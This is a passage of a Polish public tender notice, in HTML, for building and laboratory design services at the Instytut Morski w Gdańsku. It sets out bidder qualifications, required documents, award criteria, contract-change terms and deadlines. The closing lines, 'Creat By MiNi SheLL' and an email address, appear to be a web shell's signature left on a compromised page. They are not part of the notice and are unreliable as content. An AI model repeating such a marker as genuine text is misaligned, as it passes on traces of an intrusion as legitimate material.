ba) nowego budynku użyteczności publicznej lub innego nowego budynku o przeznaczeniu administracyjno-biurowym. Wykonawca musi wykazać wykonanie min. jednej usługi projektowej o wartości min. 100.000 zł netto (słownie zł: sto tysięcy). Ww. wykonana usługa musi dotyczyć budynku o powierzchni użytkowej min. 1000 m2 lub kubatury min. 3000  m3. Dopuszcza się wykazanie tego warunku, jeżeli Wykonawca zamiast projektowania nowego budynku, wykonał dokumentację modernizacji lub adaptacji istniejącego budynku użyteczności publicznej lub innego budynku o przeznaczeniu administracyjno-biurowym albo innego budynku dla potrzeb użyteczności publicznej. W tym przypadku należy wykazać się min. jedną usługą projektową modernizacji lub adaptacji, o wartości min. 100.000 zł netto i jednocześnie wykonana usługa modernizacji lub adaptacji musi dotyczyć budynków lub ich części, o powierzchni użytkowej min. 1000 m2 lub kubatury min. 3000  m3. Dopuszcza się łączenie ww. usług (zarówno w ramach nowoprojektowanych jak i modernizowanych i adaptowanych budynków lub ich części) w celu wykazania spełnienia warunku udziału w zakresie usług projektowania, wartości usługi, powierzchni użytkowej lub kubatury, z zastrzeżeniem, że do każdej z tych usług będą załączone dowody potwierdzające ich należyte wykonanie. Dopuszcza się wykazanie wykonania ww. usługi o wartości min. 100.000 zł. netto, wraz z usługą nadzoru autorskiego. Za datę wykonania usług, przyjmuje się datę zakończenia i odbioru dokumentacji projektowej.     

bb) nowego budynku laboratoryjnego. Wykonawca musi wykazać wykonanie  min. jednej usługi projektowej o wartości min. 100.000 zł netto (słownie zł: sto tysięcy). Ww. wykonana usługa musi dotyczyć budynku o powierzchni użytkowej min. 300 m2 lub kubatury min. 800 m3. Dopuszcza się wykazanie tego warunku, jeżeli Wykonawca zamiast projektowania ww. nowych budynków, wykonał dokumentację modernizacji lub adaptacji budynku lub pomieszczeń dla potrzeb laboratoryjnych. W tym przypadku należy wykazać się min. jedną usługą projektową z zakresu modernizacji lub adaptacji, o wartości min. 100.000 zł netto i jednocześnie wykonana usługa modernizacji lub adaptacji musi dotyczyć budynku lub pomieszczeń o powierzchni użytkowej min. 300 m2 lub kubatury min. 800  m3. Dopuszcza się łączenie tych usług (zarówno w ramach nowoprojektowanych jak i modernizowanych i adaptowanych budynków lub pomieszczeń) w celu wykazania spełnienia tego warunku udziału w zakresie  usług projektowania, wartości usługi, powierzchni użytkowej lub kubatury, z zastrzeżeniem, że do każdej z tych usług będą załączone dowody potwierdzające ich należyte wykonanie. Dopuszcza się wykazanie wykonania ww. usługi o wartości min. 100.000 zł. netto, wraz z usługą nadzoru autorskiego. Za datę wykonania usług, przyjmuje się datę zakończenia i odbioru dokumentacji projektowej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - urbanistyka - 10</li>
<li>3 - architektura - 10</li>
<li>4 - funkcjonalność - 10</li>
<li>5 - materiały i ekonomia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2)	Zamawiający dopuszcza możliwość dokonywania wszelkich nieistotnych zmian umowy. Zamawiający przewiduje możliwość dokonania zmian Umowy w oparciu o art. 144 ust. 1 PZP.  Warunki powodujące zmianę umowy:
1. Istotna zmiana postanowień Umowy w stosunku do treści oferty możliwa jest wyłącznie w przypadkach i w zakresach opisanych w niniejszym paragrafie.
2. Zmiana zakresu przedmiotu Umowy jest możliwa w przypadku:
2.1. Wyłączenia z zakresu przedmiotu Umowy nadzoru autorskiego, jeżeli Zamawiający, w okresie ważności pozwolenia na budowę, nie przystąpi do realizacji robót budowlanych objętych Projektem.
2.2. Ograniczenia zakresu nadzoru autorskiego, jeżeli Zamawiający, w okresie ważności pozwolenia na budowę, nie zrealizuje części robót budowlanych objętych Projektem.
3. Zmiana wynagrodzenia jest możliwa w przypadku:
3.1. Zmiany stawki podatku VAT powodującej zwiększenie kosztów wykonania Umowy po stronie Wykonawcy. W powyższym przypadku Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę.
3.2. Zmiany stawki podatku VAT powodującej zmniejszenie kosztów wykonania Umowy po stronie Wykonawcy. W powyższym przypadku Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę.
3.3. W przypadku wyłączenia nadzoru autorskiego z przedmiotu Umowy na podstawie ust. 2.1. niniejszego paragrafu. W takim przypadku wynagrodzenie za wykonanie przedmiotu Umowy określone w § 2 ust. 2 lit. b Umowy, ulega zmniejszeniu o kwotę wynagrodzenia za nadzór autorski określoną w § 2 ust. 2 lit. b Umowy.
3.4. W przypadku ograniczenia zakresu nadzoru autorskiego na podstawie ust. § 11 ust. 2.2. Umowy. W takim przypadku wynagrodzenie za nadzór autorski określone w § 2 ust. 2. lit. b, Umowy,  ulega zmniejszeniu w stopniu odpowiadającym udziałowi nie wykonanych robót budowlanych w całym zakresie robót budowlanych objętych Projektem, ustalonym na podstawie kosztorysów inwestorskich.
3.5. Stwierdzenia rozbieżności lub niejasności w rozumieniu określeń użytych w Umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów przez Strony. W takim przypadku, zmiana może być dokonana jeżeli nie jest istotna, a jej skutkiem jest usunięcie rozbieżności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej zapisów. 
3.6 Zmiana w wynagrodzeniu Wykonawcy w przypadku zmiany wysokości  minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę oraz zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
4. Zmiana Głównego Projektanta uczestniczącego w wykonywaniu zamówienia jest możliwa, jedynie w przypadku śmierci, choroby lub wypadku lub innej przyczyny wyłączającej możliwość pracy tej osoby, z przyczyn niezależnych od Wykonawcy.
Powyższa zmiana wymaga uzyskania pisemnej zgody Zamawiającego. Osoba wskazana przez Wykonawcę musi posiadać kwalifikacje i doświadczenie, jakich wymagał Zamawiający w pkt 5 lit. c  SIWZ. Zamawiający może żądać zmiany Głównego Projektanta, jeżeli w jego opinii osoba ta jest nieefektywna lub nie wywiązuje się z obowiązków wynikających z Umowy.
6. Zmiana terminu wykonania przedmiotu Umowy w zakresie uzyskania ostatecznej decyzji o pozwoleniu na budowę. Warunkiem dokonania zmiany jest wykazanie przez Wykonawcę, że w wymaganym terminie nie uzyskał zatwierdzenia projektu budowlanego w decyzji o pozwoleniu na budowę, pomimo dochowania należytej staranności i z przyczyn od niego niezależnych. W takim przypadku nowy termin zostanie ustalony z uwzględnieniem znaczenia okoliczności wykazanych przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.im.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Morski w Gdańsku ul. Długi Targ 41/42, 80-830 Gdańsk - pok. nr 7. Opłata za przesłanie SIWZ: 492,00 zł. (słownie: czterysta dziewięćdziesiąt dwa złote i 00 gr)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2016 godzina 13:00, miejsce: Instytut Morski w Gdańsku ul. Długi Targ 41/42, 80-830 Gdańsk, pok. nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opłata za przesłanie SIWZ: 492,00 zł. (słownie: czterysta dziewięćdziesiąt dwa złote i 00 gr). Opłatę za przesłanie SIWZ należy wpłacić przelewem na poniższe konto Zamawiającego: 
Bank  Zachodni WBK S.A. 
PL 57 1090 1098 0000 0001 3091 6151
Swift: WBKPPLPP
tytułem wpłata za przesłanie SIWZ z zał. 
Przed dokonaniem ww. opłaty, Wykonawca zobowiązany jest poinformować o tym zamiarze Zamawiającego, w celu wystawienia odpowiedniej faktury dla Wykonawcy.  

Zamawiający, zgodnie z art. 24 ust. 2a ustawy Pzp, wykluczy z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postepowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postepowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com